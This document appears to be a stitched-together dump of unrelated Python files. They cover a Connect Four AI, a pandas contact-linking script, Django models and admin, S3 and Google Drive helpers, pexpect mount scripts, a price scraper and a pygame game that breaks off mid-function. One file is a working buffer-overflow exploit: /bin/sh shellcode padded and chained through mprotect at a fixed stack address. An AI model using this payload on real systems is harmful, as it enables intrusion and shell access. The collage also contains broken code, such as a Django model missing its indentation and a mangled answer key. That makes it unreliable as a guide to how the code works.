        if len(moves) == 1:
            return moves[0]

        opponent = 3 - player
        scratch = board.clone()
        winning = []
        losing = set()
        for col in moves:
            if board.isWinningMove(col, player):
                winning.append(col)
            # play the move on the scratch board and see whether it hands
            # the opponent an immediate win
            scratch.makeMove(col, player)
            if any(scratch.isWinningMove(reply, opponent)
                   for reply in scratch.possibleMoves()):
                losing.add(col)
            scratch.unmakeMove(col)

        safe = [c for c in moves if c not in losing]
        if winning:
            return random.choice(winning)
        if safe:
            return random.choice(safe)
        return random.choice(moves)
class Monty:
    '''
    This player will randomly simulate games for each possible move,
    picking the one that has the highest probability of success.
    '''

    def __init__(self, n, player):
        '''
        Initialize the player using a simpler computer player.

        Arguments:
          n -- number of games to simulate.
          player -- the computer player
        '''
        assert n > 0
        self.player = player
        self.n = n

    def chooseMove(self, board, player):
        '''
        Given the current board and player number, choose and return a move.

        Arguments:
          board -- a Connect4Board instance
          player -- either 1 or 2

        Precondition: There must be at least one legal move.
        Invariant: The board state does not change.
        '''
        assert player in [1, 2]
        p = board.possibleMoves()
        move = p[0]
        wins = 0
        most_wins = 0
        for col in p:
            # an immediately winning move needs no simulation
            if board.isWinningMove(col, player):
                move = col
                break
            # simulate n games starting from this move and count our wins
            board.makeMove(col, player)
            for i in range(self.n):
                sim = Connect4Simulator(board.clone(), self.player, \
                                        self.player, 3 - player)
                result = sim.simulate()
                if result == player:
                    wins += 1
            # keep the move with the highest win count seen so far
            if wins > most_wins:
                most_wins = wins
                move = col
            board.unmakeMove(col)
            wins = 0  # reset the counter before evaluating the next move
        return move
|
"""
helloworld.py
Author: xXxXxNimbleNavigatorxXxXx
Credit: kezarburgar
Assignment:Hello, world
Write and submit a Python program that prints the following:
Hello, world!
"""
# Print the assignment's required greeting.
print("Hello, world!")
|
from _typeshed import Incomplete
from collections.abc import Generator
# Type stub (no body): appears to be the typeshed signature for networkx's
# beam-search BFS edge generator; `width=None` presumably means an
# unbounded beam width — verify against the networkx documentation.
def bfs_beam_edges(
    G, source, value, width: Incomplete | None = None
) -> Generator[Incomplete, Incomplete, Incomplete]: ...
|
#!/usr/bin/python
import struct
def p(x):
    """Pack `x` as a 4-byte little-endian unsigned integer."""
    return struct.pack('<L', x)
# Shellcode bytes (appear to spawn /bin/sh via int 0x80 — not verified here).
PAYLOAD="jhh\x2f\x2f\x2fsh\x2fbin\x89\xe31\xc9j\x0bX\x99\xcd\x80"
# Address of the vulnerable buffer, and its page-aligned base for mprotect.
BUFFER_ADDRESS=0xbffff730
BUFFER_ADDRESS_ALIGNED=0xbffff000

payload = ""
payload += PAYLOAD
# pad up to the overwrite point: name size + arguments
while len(payload) < 32 + 4*3:
    payload += "B"
payload += p(0x080523E0)  # mprotect
payload += p(BUFFER_ADDRESS)  # Jump to shellcode
payload += p(BUFFER_ADDRESS_ALIGNED)  # mprotect addr argument (page aligned)
payload += p(0x1000)  # 4096 -- length argument
payload += p(0x7)  # PROT_READ|PROT_WRITE|PROT_EXEC
print payload
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 7 00:08:24 2021
@author: User
"""
import pandas as pd

# Ticket-linking script: contacts that share an Email, Phone or OrderId are
# treated as the same person and later merged into connected components.
data=pd.read_json('contacts.json')
# Field lengths serve as "identifier present" flags (empty string -> 0).
data['email_len']=data['Email'].apply(lambda x:len(x))
data['phone_len']=data['Phone'].apply(lambda x:len(x))
data['order_len']=data['OrderId'].apply(lambda x:len(x))
# Rows where each single identifier is present.
email=data[data['email_len']!=0][['Email','Id']]
order=data[data['order_len']!=0][['OrderId','Id']]
phone=data[data['phone_len']!=0][['Phone','Id']]
# Rows carrying two identifiers at once.
ep=data[(data['email_len']!=0)&(data['phone_len']!=0)][['Email','Phone','Id']]
eo=data[(data['email_len']!=0)&(data['order_len']!=0)][['Email','OrderId','Id']]
po=data[(data['phone_len']!=0)&(data['order_len']!=0)][['Phone','OrderId','Id']]
# Right-join each two-identifier frame back onto the single-identifier frames
# so every pair of ticket Ids sharing an identifier shows up in some merge.
eoe=pd.merge(eo,email,how='right',on=['Email'])
eoo=pd.merge(eo,order,how='right',on=['OrderId'])
epe=pd.merge(ep,email,how='right',on=['Email'])
epp=pd.merge(ep,phone,how='right',on=['Phone'])
pop=pd.merge(po,phone,how='right',on=['Phone'])
poo=pd.merge(po,order,how='right',on=['OrderId'])
eoe_epe=pd.merge(eoe,epe,how='outer',on=['Email'])
eoo_poo=pd.merge(eoo,poo,how='outer',on=['OrderId'])
epp_pop=pd.merge(epp,pop,how='outer',on=['Phone'])
# Keep only the four Id columns produced by the chained merges.
id1=eoe_epe[[ 'Id_x_x', 'Id_y_x','Id_x_y', 'Id_y_y']]
id2=eoo_poo[[ 'Id_x_x', 'Id_y_x','Id_x_y', 'Id_y_y']]
id3=epp_pop[[ 'Id_x_x', 'Id_y_x','Id_x_y', 'Id_y_y']]
id_df=pd.concat([id1,id2,id3])
def is_missing(col1, col2, col3, col4):
    """Return the first non-null of the four values; col4 is the fallback."""
    for candidate in (col1, col2, col3):
        if not pd.isnull(candidate):
            return candidate
    return col4
# Backfill each Id column with the first non-null Id among the four.
id_df['Id_x_x']= id_df.apply(lambda x: is_missing(x['Id_x_x'],x['Id_y_x'],x['Id_x_y'],x['Id_y_y']),axis=1)
id_df['Id_x_y']= id_df.apply(lambda x: is_missing(x['Id_x_y'],x['Id_y_x'],x['Id_x_x'],x['Id_y_y']),axis=1)
id_df['Id_y_x']= id_df.apply(lambda x: is_missing(x['Id_y_x'],x['Id_x_x'],x['Id_x_y'],x['Id_y_y']),axis=1)
id_df['Id_y_y']= id_df.apply(lambda x: is_missing(x['Id_y_y'],x['Id_y_x'],x['Id_x_y'],x['Id_x_x']),axis=1)
# Collapse the four columns into (id1, id2) edge pairs.
id1=id_df[['Id_x_x','Id_x_y']]
id2=id_df[['Id_y_x','Id_y_y']]
id1.rename(columns = {'Id_x_x': 'id1', 'Id_x_y': 'id2'}, inplace = True)
id2.rename(columns = {'Id_y_x': 'id1', 'Id_y_y': 'id2'}, inplace = True)
id_final=pd.concat([id1,id2])
import networkx as nx
# Treat each (id1, id2) pair as a graph edge; connected components are the
# groups of ticket Ids belonging to the same person.
id_final=list(id_final.to_records(index=False))
G=nx.from_edgelist(id_final)
l=list(nx.connected_components(G))
add_list=[]
for s in l:
    li=list(s)
    add_list.append(li)
r=pd.Series(add_list)
result=pd.DataFrame(r)
result['list_len']=result[0].apply(lambda x: len(x))
sum(result['list_len'])
contact=data[['Contacts','Id']]
# Map ticket Id -> its Contacts count for O(1) lookup.
contact=pd.Series(contact.Contacts,index=contact.Id).to_dict()
#get contact sum
def find_dict(x):
    """Sum the Contacts counts of every ticket id in the component list x."""
    return sum(contact[ticket_id] for ticket_id in x)
# Total contacts per connected component.
result['contacts']=result[0].apply(lambda x: find_dict(x))
final_dict=dict()
result_list=result[0].to_list()
# Invert: each ticket id points at the full id list of its component.
for li in result_list:
    for element in li:
        final_dict[element]=li
final_result= pd.DataFrame(list(final_dict.items()),columns = ['ticket_id','col2'])
result.rename(columns = {0: 'col2'}, inplace = True)
def list_to_string(x):
    """Render the ids sorted ascending as a '-'-joined string of ints."""
    return '-'.join(str(int(value)) for value in sorted(x))
# Canonical component key: sorted ids joined by '-'.
result['col3']=result['col2'].apply(lambda x:list_to_string(x))
final_result['col3']=final_result['col2'].apply(lambda x:list_to_string(x))
final=pd.merge(final_result[['ticket_id','col3']],result[['col3','contacts']],on=['col3'])
final['contacts']=final['contacts'].astype(str)
# Output column format: "<trace>, <contact count>".
final['col3/contact']=final[['col3','contacts']].agg(', '.join,axis=1)
final.rename(columns = {'col3/contact': 'ticket_trace/contact'}, inplace = True)
final=final.sort_values(by=['ticket_id'])
final['ticket_id']=final['ticket_id'].astype(int)
final[['ticket_id','ticket_trace/contact']].to_csv('result.csv',index=False)
"""
Definition of models.
"""
from django.db import models
class Place(models.Model):
name = models.CharField(max_length=200, null=True, blank=True)
position = models.CharField(max_length=200, null=True, blank=True)
def __str__(self):
return self.name + " " + self.position |
import logging
from typing import IO, Any, Dict
from urllib.parse import urlparse
_s3_client = None  # lazily-created, module-cached boto3 S3 client
log = logging.getLogger(__name__)
def get_s3_client() -> Any:
    """Return the module-cached boto3 S3 client, creating it on first use."""
    global _s3_client
    if _s3_client is None:
        # Imported lazily so importing this module does not require boto3.
        import boto3

        _s3_client = boto3.client("s3")
    return _s3_client
def s3_write(
    url: str, source_fp: IO[bytes], *, options: Dict[str, Any], dry_run: bool
) -> None:
    """Upload the contents of source_fp to the given s3:// url.

    options may carry an 'acl' entry that is forwarded as the object ACL.
    When dry_run is true, only log what would have been written.
    """
    purl = urlparse(url)
    s3_client = get_s3_client()
    # Only plain s3://bucket/key urls are supported (no query string).
    assert purl.scheme == "s3"
    assert not purl.query
    acl = options.get("acl")
    kwargs = dict(Bucket=purl.netloc, Key=purl.path.lstrip("/"), Body=source_fp)
    if acl:
        kwargs["ACL"] = acl
    if dry_run:
        log.info("Dry-run: would write to S3 (ACL %s): %s", acl, url)
        return
    s3_client.put_object(**kwargs)
    log.info("Wrote to S3 (ACL %s): %s", acl, url)
|
#!/usr/bin/env python
# Demo exercising the third-party 'marquee' logging handler/formatters,
# which emit records as CloudWatch Events.
import json
import logging
from marquee.formatter import MarqueeFormatter, MarqueeEventFormatter
from marquee.handler import CloudWatchEventsHandler

log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
handler = CloudWatchEventsHandler(detail_type='new_type')
log.addHandler(handler)
fmt_log = MarqueeFormatter('theherk.testapp')
handler.setFormatter(fmt_log)
log.info('%s says Hello. This is dog.', 'val')
fmt_event = MarqueeEventFormatter(event_type='theherk.testevent', source='theherk.testapp')
handler.setFormatter(fmt_event)
# NOTE(review): the '%s' key inside the JSON payload is a logging
# placeholder and gets substituted with 'user' when the record is
# formatted -- presumably intentional for this demo; confirm.
log.error(
    json.dumps(
        {
            '%s':'jeffrey',
            'other':'stuff'
        }
    ), 'user'
)
|
"""pie
answers:
3
2
1
[3,1,4,1,5,9]
[1]
True
False
False
[3,1,4,1,5,9,2,6,5,3]
[4,1,5,9,1]
True
'ten',1,4,1,5,9,1]"""
numbers = [3, 1, 4, 1, 5, 9, 2]
print(numbers[0])
print(numbers[-1])
print(numbers[3])
print(numbers[:-1])
print(numbers[3:4])
print(5 in numbers)
print(7 in numbers)
print("3" in numbers)
print(numbers + [6, 5, 3])
numbers[0] = "ten"
numbers[-1] = 1
print(numbers[2:])
print(9 in numbers)
print(numbers)
|
import array
class ArrayList:
    """A growable list backed by a fixed-capacity array.array of C longs.

    `length` counts the leading slots in use; the backing array doubles
    in capacity whenever it fills up.
    """

    def __init__(self, capacity):
        """Create an empty list with the given initial capacity."""
        self.capacity = capacity
        self.length = 0
        self.array = array.array('l', [0] * capacity)

    def is_empty(self):
        """Return True when no elements are stored."""
        return self.length == 0

    def get_capacity(self):
        """Double the capacity (historical name -- this *grows* storage)."""
        self.capacity *= 2
        new_arr = array.array('l', [0] * self.capacity)
        for i in range(self.length):
            new_arr[i] = self.array[i]
        self.array = new_arr

    def check_index(self, index):
        """Raise IndexError when `index` is outside [0, length).

        Fixed: the original only printed 'Index Error' and then let the
        calling operation run anyway on the bad index; raising makes the
        failure explicit and stops the operation.
        """
        if index >= self.length or index < 0:
            raise IndexError('Index Error')

    def prepend(self, value):
        """Insert value at the front, shifting everything one slot right."""
        if self.length == self.capacity:
            self.get_capacity()
        for i in range(self.length - 1, -1, -1):
            self.array[i + 1] = self.array[i]
        self.array[0] = value
        self.length += 1

    def append(self, value):
        """Add value at the end, growing the backing array if full."""
        if self.length == self.capacity:
            self.get_capacity()
        self.array[self.length] = value
        self.length += 1

    def set_head(self, index):
        """Drop the first `index` elements so `index` becomes the new head."""
        self.check_index(index)
        self.array = self.array[index:]
        self.capacity -= index
        self.length -= index

    def access(self, index):
        """Return the element stored at `index` (0-based)."""
        self.check_index(index)
        return self.array[index]

    def insert(self, index, value):
        """Insert value before existing position `index`."""
        self.check_index(index)
        if self.length == self.capacity:
            self.get_capacity()
        for i in range(self.length - 1, index - 1, -1):
            self.array[i + 1] = self.array[i]
        self.array[index] = value
        self.length += 1

    def remove(self, index):
        """Delete the element at `index`, shifting the tail one slot left."""
        self.check_index(index)
        for i in range(index, self.length - 1):
            self.array[i] = self.array[i + 1]
        self.length -= 1

    def print(self):
        """Print the live elements, or a notice when empty."""
        if self.is_empty():
            print('ArrayList is empty.')
        else:
            print('ArrayList =>', end=' ')
            for i in self.array.tolist()[:self.length]:
                print(i, end=' ')
            print()
# Demo: exercise every ArrayList operation, printing state after each step.
array_list = ArrayList(5)
array_list.print()
for i in range(7):
    array_list.prepend(i + 1)
array_list.print()
for i in range(7):
    array_list.append(i + 10)
array_list.print()
array_list.set_head(5)
array_list.print()
array_list.insert(5,1000)
array_list.print()
array_list.remove(3)
array_list.print()
print(array_list.access(4))
import urllib.request
import time
def get_price():
    # Scrape a "price" from the page HTML by locating the literal marker
    # 'Fact%2F' and reading the two characters right after it.
    # NOTE(review): extremely fragile -- depends on exact page markup and
    # assumes a two-digit value; confirm against the live page. When the
    # marker is missing, find() returns -1 and the slice is garbage.
    page= urllib.request.urlopen("https://www.taobao.com")
    text=page.read().decode("utf8")
    where=text.find('Fact%2F')
    start=where+7
    end=where+9
    return(float(text[start:end]))


price=get_price()
ans=input("do you want the answer instantly: ")
if ans=="y":
    print(price)
else:
    # Poll every 10 seconds until the scraped price drops to 20 or below.
    price=99.9
    while price>20:
        time.sleep(10)
        price=get_price()
    print("buy")
|
'''
Created on Jun 24, 2015
@author: rebaca
'''
from robot.api import logger
import pexpect
import re
import os
import subprocess
def create_dirs_under_mount(password, mount_path, start, end):
    """Recreate <mount_path>/{start..end}/status directories.

    Tries as the current user first; on 'Permission denied' retries the
    same command as root via su (password fed through pexpect).
    NOTE(review): relies on bash-style {start..end} brace expansion, so
    shell=True is intentional here -- but it is injection-prone if the
    arguments are untrusted. Python 2 module: communicate() returns str.
    """
    # Remove existing folders
    rmdir_out = subprocess.Popen('rm -rf ' + mount_path + '/{' + start + '..' \
        + end + '}', shell=True, stdout=subprocess.PIPE, \
        stderr=subprocess.PIPE)
    rmdir_output, rmdir_errors = rmdir_out.communicate()
    if 'Permission denied' in rmdir_errors:
        user = 'root'
        (rmdir_output, exitstatus1) = pexpect.run\
            ("su " + user + " -c \'rm -rf " + mount_path + "/{" + start + ".." + \
            end + "}\'", events={'(?i)password':'' + password + '\n'}, \
            withexitstatus=1)
    # Create new folders for the provided range
    mkdir_out = subprocess.Popen('mkdir -p ' + mount_path + '/{' + start + \
        '..' + end + '}/status', shell=True, stdout=subprocess.PIPE, \
        stderr=subprocess.PIPE)
    mkdir_output, mkdir_errors = mkdir_out.communicate()
    if 'Permission denied' in mkdir_errors:
        user = 'root'
        (mkdir_output, exitstatus2) = pexpect.run\
            ("su " + user + " -c \'mkdir -p " + mount_path + "/{" + start + ".." \
            + end + "}/status\'", events={'(?i)password':'' + password + '\n'}, \
            withexitstatus=1)
def get_os_name(ip_add, password):
    """Return the remote host's OS identification string via ssh.

    Runs 'uname' first; if the remote reports the command is
    'not recognized' (a Windows host), retries with the Windows 'ver'.
    """
    cmd_lin = 'uname'
    cmd_win = 'ver'
    command_output = pexpect.run("ssh rebaca@"+ip_add+" '"+cmd_lin+"'", \
        events={'Are you sure you want to continue connecting' + \
        ' (yes/no)?':'yes' + '\n', '(?i)password':''+password+'\n'}, \
        timeout=300)
    logger.console("Cmd_op==>%s" % (command_output))
    if 'not recognized' in command_output:
        command_output = pexpect.run("ssh rebaca@"+ip_add+" '"+cmd_win+"'", \
            events={'Are you sure you want to continue connecting' + \
            ' (yes/no)?':'yes' + '\n', '(?i)password':''+password+'\n'}, \
            timeout=300)
        logger.console("Cmd_op==>%s" % (command_output))
        # Both branches return the last command output.
        return command_output
    else:
        return command_output
def get_os_parameters(ip_add, password):
    """Return {'system_os', 'user_id', 'pwd'} for the remote host.

    The OS is probed via get_os_name(); an unrecognised OS yields {}.
    """
    os_name = get_os_name(ip_add, password)
    if 'Windows' in os_name:
        return {'system_os': 'Windows', 'user_id': 'rebaca', 'pwd': 'rebaca'}
    if 'Linux' in os_name:
        return {'system_os': 'Linux', 'user_id': 'root', 'pwd': 'rebaca'}
    return {}
def create_mount_directory(ip_add, password, root_path):
    """Mount <ip_add>:<root_path> under a per-host local directory.

    Returns the local mount path. An already-existing mount point is
    unmounted first; otherwise the directory is created. The Linux and
    Windows branches differ only in the mount-path prefix (candidate for
    factoring). Python 2 module: note the bare print statement below.
    """
    # Last two octets of the ip, dots -> underscores, keep paths unique.
    ip_trim = str(re.search(r'(\d+\.\d+\.)(\d+\.\d+)', ip_add).group(2))
    ip_trim = ip_trim.replace('.', '_')
    os_params = get_os_parameters(ip_add, password)
    if os_params['system_os'] == 'Linux':
        mount_path = '/home/rebaca/Azuki_Framework/linux_mount_' + ip_trim
        if os.path.exists(mount_path):
            unmount = "su root -c \'umount " + mount_path + "\'"
            # logger.console('unmount cmd ==>%s' %(unmount))
            unmount_output = pexpect.run(unmount, events={'Password':''+password+'\n'})
            # logger.console('unmount_output ==>%s' %(unmount_output))
        else:
            out = subprocess.Popen('mkdir -p '+mount_path, shell=True)
            output, errors = out.communicate()
        mount_cmd = "su root -c \'mount " + ip_add + ":" + root_path + " " + mount_path + "\'"
        logger.console('command_output ==>%s' % (mount_cmd))
        command_output = pexpect.run(mount_cmd, events={'Password':''+password+'\n'})
        logger.console('command_output ==>%s' % (command_output))
        if 'failed' not in command_output:
            logger.console('Linux mount path created successfully')
        else:
            logger.info('Failed!! Issues while mounting the segmenter output folder')
            logger.info(command_output)
        return mount_path
    elif os_params['system_os'] == 'Windows':
        mount_path = '/home/rebaca/Azuki_Framework/windows_mount_' + ip_trim
        if os.path.exists(mount_path):
            unmount = "su root -c \'umount " + mount_path + "\'"
            # logger.console('unmount cmd ==>%s' %(unmount))
            print "Running unmount cmd with pexpect"
            unmount_output = pexpect.run(unmount, events={'Password':''+password+'\n'})
            # logger.console('unmount_output ==>%s' %(unmount_output))
        else:
            out = subprocess.Popen('mkdir -p '+mount_path, shell=True)
            output, errors = out.communicate()
        mount_cmd = "su root -c \'mount " + ip_add + ":" + root_path + " " + mount_path + "\'"
        #logger.console('command_output ==>%s' % (mount_cmd))
        command_output = pexpect.run(mount_cmd, events={'Password':''+password+'\n'})
        #logger.console('command_output ==>%s' % (command_output))
        if 'failed' not in command_output:
            logger.console('Windows mount path created successfully')
        else:
            logger.info('Failed!! Issues while mounting the segmenter output folder')
            logger.info(command_output)
        return mount_path
|
def function(reverse_list):
    """Reverse the given list in place and print the result.

    The original bound an unused counter (i = 0) and double-wrapped the
    print argument in parentheses; both removed.
    """
    reverse_list.reverse()
    print(reverse_list)
# Sample data; `function` reverses it in place and prints it.
reverse_list = [6, 8, 4, 3, 9, 56, 0, 34, 7, 15]
function(reverse_list)
#from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
# OAuth scope, client-secret location and app name for the Drive API.
SCOPES = 'https://www.googleapis.com/auth/drive'
CLIENT_SECRET_FILE = 'api/client_secret.json'
APPLICATION_NAME = 'MUMT-IT'
def get_credentials():
    """Return valid user credentials, running the OAuth flow when needed.

    Credentials are cached in ~/.credentials/drive-python-readonly.json.
    argparse flags (when argparse is importable) are forwarded to the
    oauth2client flow runner.
    """
    try:
        import argparse
        flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
    except ImportError:
        flags = None
    home_dir = os.path.expanduser('~')
    credential_dir = os.path.join(home_dir, '.credentials')
    if not os.path.exists(credential_dir):
        os.makedirs(credential_dir)
    credential_path = os.path.join(credential_dir, 'drive-python-readonly.json')
    store = Storage(credential_path)
    credentials = store.get()
    if not credentials or credentials.invalid:
        flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
        flow.user_agent = APPLICATION_NAME
        if flags:
            credentials = tools.run_flow(flow, store, flags)
        else:
            # tools.run() is the deprecated, pre-flags fallback.
            credentials = tools.run(flow, store)
        # Fixed: the original message lacked the space before the path.
        print('Storing credentials to ' + credential_path)
    return credentials
def get_credentials_from_file():
    """Load previously stored credentials (or None) without any OAuth flow."""
    credential_dir = os.path.join(os.path.expanduser('~'), '.credentials')
    if not os.path.exists(credential_dir):
        os.makedirs(credential_dir)
    credential_path = os.path.join(credential_dir, 'drive-python-readonly.json')
    return Storage(credential_path).get()
def get_file_list(folder_id, credentials):
    """Return [{'id', 'name'}] for files directly inside a Drive folder.

    Only the first page (up to 10 entries) is fetched; an empty folder
    yields an empty list.
    """
    http = credentials.authorize(httplib2.Http())
    service = discovery.build('drive', 'v3', http=http)
    results = service.files().list(
        pageSize=10,
        q="'%s' in parents" % str(folder_id),
        fields="nextPageToken, files(id, name)").execute()
    items = results.get('files', [])
    return [{'id': item['id'], 'name': item['name']} for item in items]
if __name__=='__main__':
    # Manual smoke test: run the OAuth flow and dump the credentials.
    credentials = get_credentials()
    print(credentials.to_json())
from django.contrib import admin
from django.db import models
from .models import Topic, Course, Student, Order
class CourseAdmin(admin.ModelAdmin):
    """Admin for Course: list columns plus a bulk 'add 50 hours' action."""
    # list to display the fields of Course model
    list_display = ['name', 'topic', 'price', 'hours', 'for_everyone']
    actions = ['add_50_to_hours']

    # action for CourseAdmin to add hours of selected course by 50
    def add_50_to_hours(self, request, queryset):
        # Fixed: the original looped over the queryset calling
        # queryset.update() per object, which set EVERY selected course's
        # hours to last_obj.hours + 50. An F() expression increments each
        # row by 50 in a single atomic query instead.
        queryset.update(hours=models.F('hours') + 50)
    add_50_to_hours.short_description = "Add 50 to hours"
class StudentAdmin(admin.ModelAdmin):
    """Admin for Student: shows the upper-cased full name and the city."""
    list_display = ['upper_case_name', 'city']

    def upper_case_name(self, obj):
        # Computed list_display column: "FIRST LAST".
        full_name = "{} {}".format(obj.first_name, obj.last_name)
        return full_name.upper()
    upper_case_name.short_description = 'Full Name'
# Register your models here.
# Topic and Order use the default ModelAdmin.
admin.site.register(Topic)
admin.site.register(Course, CourseAdmin)
admin.site.register(Student, StudentAdmin)
admin.site.register(Order)
|
# while True:
# name= input("Nhap vao ten: ")
# if name.isalpha() == True:
# break
# while True:
# name= input("nhap ten: ")
# if name.isalpha() == False:
# break
# while True:
# name= input("nhap ten: ")
# if name.isalpha() == False:
# break
# ask = input("enter your number: ")
# print("the number your has",len(ask),"digits")
# import pyglet
# music = pyglet.resource.media('viDu.mp3')
# music.play()
# pyglet.app.run()
# for i in range(3,12,2):
# print(i,end=' ')
|
import pygame
import random
import json
from classes.classes import *
RES = (700, 600)     # window resolution (width, height) in px
PASS_HEIGHT = 180    # nominal vertical gap the player flies through
WALL_SPEED = 5       # horizontal wall scroll speed, px per frame
WALL_WIDTH = 60      # wall block width, px
WALL_HEIGHT = 60     # wall block height, px
FPS = 60             # target frame rate
# non-main functions --- #
def generate_new_blocks(color:list, x_offset: int = 0, block_count: int=3) -> list:
    """Build a vertical column of Wall blocks just off the right edge.

    Gaps between consecutive blocks are randomized around PASS_HEIGHT;
    x_offset shifts the whole column further right.
    """
    blocks = []
    total_height = 0
    # The first gap may place the top block partly above the screen.
    gap = random.randint(-WALL_HEIGHT, PASS_HEIGHT)
    for _ in range(block_count):
        rect = pygame.Rect(RES[0]+x_offset, gap + total_height, WALL_WIDTH, WALL_HEIGHT)
        total_height += gap + WALL_HEIGHT
        gap = random.randint(PASS_HEIGHT-50, PASS_HEIGHT+50)
        blocks.append(Wall(rect, color))
    return blocks
def generate_new_shop_list():
    """Build the shop UI: one [button, price text] pair per shop item.

    Owned palettes (item[0] truthy) preview their three colour stripes;
    unowned ones show a padlock icon plus their coin price.
    """
    l = []
    for i, item in enumerate(shop_data):
        new_btn = DrawingButton(pygame.Rect((RES[0]-210)/2+50, (RES[1]-210)/2 + 300*i, 210, 210))
        new_btn.add_drawing('rect', [15,15,15], pygame.Rect(0, 0, 210, 210))
        if item[0]:
            # Owned: draw the palette's three colour stripes.
            new_btn.add_drawing('rect', item[1][0], pygame.Rect(6, 6, 66, 198))
            new_btn.add_drawing('rect', item[1][1], pygame.Rect(72, 6, 66, 198))
            new_btn.add_drawing('rect', item[1][2], pygame.Rect(138, 6, 66, 198))
        else:
            # Not owned: draw a simple padlock icon.
            new_btn.add_drawing('rect', [200, 200, 200], pygame.Rect(105-20, 105-30, 40, 30))
            new_btn.add_drawing('rect', [15, 15, 15], pygame.Rect(105-10, 105-20, 20, 25))
            new_btn.add_drawing('rect', [200, 200, 200], pygame.Rect(105-30, 105, 60, 35))
        # Free owned items show no price label.
        price_txt = Text(
            'fonts/Signika.ttf', 50, [0, 0],
            str(item[2])+" Coins" if (item[2] != 0 or not item[0]) else "",
            colors[(color_abs_id+2) % 3],
            True
        )
        price_txt.set_pos_to_center(RES, [-200, new_btn.rect[1]-195])
        l.append([new_btn, price_txt])
    return l
# pygame stuff --- #
pygame.init()
display = pygame.display.set_mode(RES)
clock = pygame.time.Clock()
pygame.display.set_caption("Triplebox!")
icon = pygame.image.load('imgs/icon.png').convert_alpha()
pygame.display.set_icon(icon)
# loading stuff --- #
with open('data/data.json', 'r') as f:
    all_data = json.load(f)
data = all_data['data']        # persistent progress: hiscore, money
shop_data = all_data['shop']   # shop items: [owned, palette, price]
# variables --- #
score = 0
color_abs_id = 0               # bumped each round to rotate palette roles
text_fade_in_factor = 150      # countdown driving the HUD text fade-in
main_run = True
game_over = False
walls = []
btn_list = []
shop_list = []
colors = shop_data[0][1]       # active palette: [player, walls, background]
init_txt_color = [x-15 for x in colors[(color_abs_id+2) % 3]]
scene_id = 0
next_scene_id = 0
'''
0 = main game loop
1 = shop
'''
# custom objects --- #
score_txt = Text('fonts/Signika.ttf', 400, [0, 0], str(score), init_txt_color, True)
score_txt.set_pos_to_center(RES, [0, -10])
hiscore_txt = Text(
    'fonts/Signika.ttf', 48, [0, 0],
    "Highscore: "+str(data['hiscore']),
    init_txt_color, True
)
hiscore_txt.set_pos_to_center(RES, [0, 160])
shop_button_txt = Text('fonts/Signika.ttf', 72, [0, 0], 'S', init_txt_color, True)
money_txt = Text(
    'fonts/Signika.ttf', 48, [0, 0],
    str(data['money'])+" Coins",
    init_txt_color, True
)
money_txt.set_pos_to_center(RES, [0, -180])
player = Player(
    pygame.Rect(-50, RES[1]//2-25, 50, 50),
    colors[color_abs_id % 3]
)
# filling lists --- #
btn_list.append(TextButton(
    pygame.Rect(RES[0]-106, 10, 96, 96),
    colors[(color_abs_id+2) % 3],
    [x-7 for x in colors[(color_abs_id+2) % 3]],
    shop_button_txt
))
# Two wall columns: one at the right edge, one half a screen further out.
walls.extend(
    generate_new_blocks(colors[(color_abs_id+1) % 3])
    + generate_new_blocks(colors[(color_abs_id+1) % 3],
                          (RES[0] + WALL_WIDTH)//2)
)
shop_list = generate_new_shop_list()
# deleting unneeded variables --- #
del init_txt_color
del icon
# main functions --- #
def events():
    """ All pygame.event and keyboard stuff here.

    Handles quit, jump, shop-button clicks, shop purchases/equips, shop
    scrolling and button hover shading. Mutates the shared game globals.
    """
    global main_run, game_over, next_scene_id, colors, shop_list
    mouse_pos = pygame.mouse.get_pos()
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            main_run = False
        elif event.type == pygame.KEYDOWN:
            if scene_id == 0:
                if event.key == pygame.K_SPACE and not game_over:
                    player.jump()
        elif event.type == pygame.MOUSEBUTTONDOWN:
            for b in btn_list:
                if b.is_over(mouse_pos):
                    b.pressed = True
        elif event.type == pygame.MOUSEBUTTONUP:
            if btn_list[0].pressed: # shop button
                btn_list[0].pressed = False
                # Toggle between the game (0) and the shop (1); the scene
                # switch itself happens in update() via next_scene_id.
                if scene_id == 0:
                    game_over = True
                    next_scene_id = 1
                else:
                    next_scene_id = 0
                    game_over = True
                    # Persist progress when leaving the shop.
                    with open('data/data.json', 'w') as f:
                        json.dump(all_data, f)
            if scene_id == 1:
                for i, b in enumerate(shop_list):
                    if b[0].is_over(mouse_pos):
                        if shop_data[i][0]:
                            # Already owned: just equip the palette.
                            colors = shop_data[i][1]
                            for btn in btn_list:
                                btn.set_colors(
                                    colors[(color_abs_id+2) % 3],
                                    [x-7 for x in colors[(color_abs_id+2) % 3]],
                                    [x-15 for x in colors[(color_abs_id+2) % 3]]
                                )
                            break
                        if shop_data[i][2] <= data['money']:
                            # Affordable: buy it and redraw the button as owned.
                            shop_data[i][0] = True
                            data['money'] -= shop_data[i][2]
                            money_txt.set_value(str(data['money'])+" Coins")
                            money_txt.set_pos([30,30])
                            b[0].drawings = []
                            b[0].add_drawing('rect', [15,15,15], pygame.Rect(0, 0, 210, 210))
                            b[0].add_drawing('rect', shop_data[i][1][0], pygame.Rect(6, 6, 66, 198))
                            b[0].add_drawing('rect', shop_data[i][1][1], pygame.Rect(72, 6, 66, 198))
                            b[0].add_drawing('rect', shop_data[i][1][2], pygame.Rect(138, 6, 66, 198))
                        break
    keys = pygame.key.get_pressed()
    if scene_id == 1:
        # Scroll the shop with the arrow keys, clamped at both list ends.
        if keys[pygame.K_DOWN] and shop_list[-1][0].rect[1] + shop_list[-1][0].rect[3] > RES[1]/2:
            for i in shop_list:
                i[0].rect[1] -= 10
                i[1].set_pos_to_center(RES, [-200, i[0].rect[1]-195])
        elif keys[pygame.K_UP] and shop_list[0][0].rect[1] < RES[1]/2:
            for i in shop_list:
                i[0].rect[1] += 10
                i[1].set_pos_to_center(RES, [-200, i[0].rect[1]-195])
    for b in btn_list:
        # Hover animation: darken the button text, then restore it.
        if b.is_over(mouse_pos) and b.text_shade > -20:
            b.modify_text_shade(-1)
        elif b.text_shade < 0:
            b.modify_text_shade(1)
def update():
    """ All updating related stuff here.

